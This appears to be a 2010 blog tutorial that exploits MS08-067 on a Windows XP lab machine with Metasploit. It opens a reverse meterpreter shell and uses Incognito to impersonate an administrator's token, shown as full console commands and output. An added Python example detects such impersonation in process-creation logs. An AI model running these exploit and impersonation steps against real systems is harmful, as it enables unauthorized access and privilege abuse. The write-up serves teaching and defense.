Using Metasploit’s Incognito To Impersonate User Tokens

January 30, 2010 – 10:48 AM

I just wanted to show a quick example of using Incognito to impersonate user tokens on a compromised system. You can think of a token as something like a web “cookie”: an object that holds your security information for the entire login process, so that you don’t have to re-authenticate to the system or network each time you want to access another object. You can read more about tokens here:

On this particular machine, “Troy” is an Admin account.

(without all the screenshots – sorry dial-up users)

We’ll start off by launching Metasploit and exploiting the system.  For this we need to make sure the payload returns a meterpreter session back to us:

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options

Module options:
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOST                     yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  thread           yes       Exit technique: seh, thread, process
LHOST                      yes       The local address
LPORT     4444             yes       The local port

Exploit target:
Id  Name
--  ----
0   Automatic Targeting

msf exploit(ms08_067_netapi) > set rhost
rhost =>
msf exploit(ms08_067_netapi) > set lhost
lhost =>
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on port 4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability...
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened ( ->

meterpreter >

Once we have a meterpreter session, we load the Incognito extension, list the available tokens, and impersonate the one we want:

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > use Incognito
Loading extension incognito...success.
meterpreter > list_tokens -u
Delegation Tokens Available
Impersonation Tokens Available
meterpreter > impersonate_token vm-winxp\\troy
[+] Delegation token available
[+] Successfully impersonated user VM-WINXP\Troy
meterpreter > getuid
Server username: VM-WINXP\Troy
meterpreter > execute -f cmd.exe -i -t
Process 416 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
meterpreter > getuid
Server username: VM-WINXP\Troy
meterpreter > drop_token
Relinquished token, now running as: NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

Complete success without having to crack passwords or “pass the hash”.
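The cmd.exe started above runs as VM-WINXP\Troy while its parent, the exploited service process, still runs as SYSTEM; that mismatch between parent and child user is what a defender can hunt for in process-creation telemetry. The Python below is an added example, not code from the original post or from Metasploit: it assumes Sysmon-style process-creation records (pid, parent pid, image, user) and uses constructed sample events that mirror the session above.

```python
from dataclasses import dataclass
from typing import Dict, List

SYSTEM = "NT AUTHORITY\\SYSTEM"
# Accounts services run under; a child created under one of these is a normal
# service start, not a sign of an impersonated user token.
SERVICE_ACCOUNTS = {SYSTEM, "NT AUTHORITY\\LOCAL SERVICE", "NT AUTHORITY\\NETWORK SERVICE"}
# SYSTEM processes that legitimately start a user's first processes at logon.
LOGON_BROKERS = {"winlogon.exe", "userinit.exe"}

@dataclass
class ProcEvent:  # the Sysmon event ID 1 fields this check needs
    pid: int
    ppid: int
    image: str
    user: str

def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def find_token_spawns(events: List[ProcEvent]) -> List[dict]:
    """Children running as a real user whose parent runs as SYSTEM and is not a
    logon broker: the footprint left by impersonate_token followed by execute."""
    procs: Dict[int, ProcEvent] = {}  # pid -> event; PID reuse is not handled here
    alerts = []
    for ev in events:
        parent = procs.get(ev.ppid)
        procs[ev.pid] = ev
        if parent is None or parent.user != SYSTEM or ev.user in SERVICE_ACCOUNTS:
            continue  # unknown parent (predates the log window) or a routine service start
        if image_name(parent.image) in LOGON_BROKERS:
            continue
        alerts.append({"pid": ev.pid, "image": image_name(ev.image), "user": ev.user,
                       "parent": image_name(parent.image)})
    return alerts

# Constructed sample records modelled on the session above, not real telemetry.
SAMPLE_EVENTS = [
    ProcEvent(620, 392, r"C:\WINDOWS\system32\winlogon.exe", SYSTEM),
    ProcEvent(668, 620, r"C:\WINDOWS\system32\services.exe", SYSTEM),
    ProcEvent(1032, 668, r"C:\WINDOWS\system32\svchost.exe", SYSTEM),  # Server service host
    ProcEvent(1500, 620, r"C:\WINDOWS\system32\userinit.exe", "VM-WINXP\\Troy"),  # console logon
    ProcEvent(1544, 1500, r"C:\WINDOWS\explorer.exe", "VM-WINXP\\Troy"),
    ProcEvent(416, 1032, r"C:\WINDOWS\system32\cmd.exe", "VM-WINXP\\Troy"),  # execute -f cmd.exe
]

if __name__ == "__main__":
    for a in find_token_spawns(SAMPLE_EVENTS):
        print(f"ALERT: pid {a['pid']} {a['image']} as {a['user']}, parent {a['parent']}")
```

Expect benign hits from svchost.exe instances hosting Task Scheduler or the DCOM launcher, which start processes under user accounts by design; tune those by service name or command line rather than by dropping svchost.exe from scope, since the exploited Server service lives in svchost.exe too.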

2 Responses to “Using Metasploit’s Incognito To Impersonate User Tokens”

[*] Started reverse handler on
[-] Exploit failed: The connection was refused by the remote host (
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >

By xpl on Apr 23, 2010

This is because egress filtering or AV is preventing it from connecting back to your machine.

By saurabh harit on Sep 28, 2010
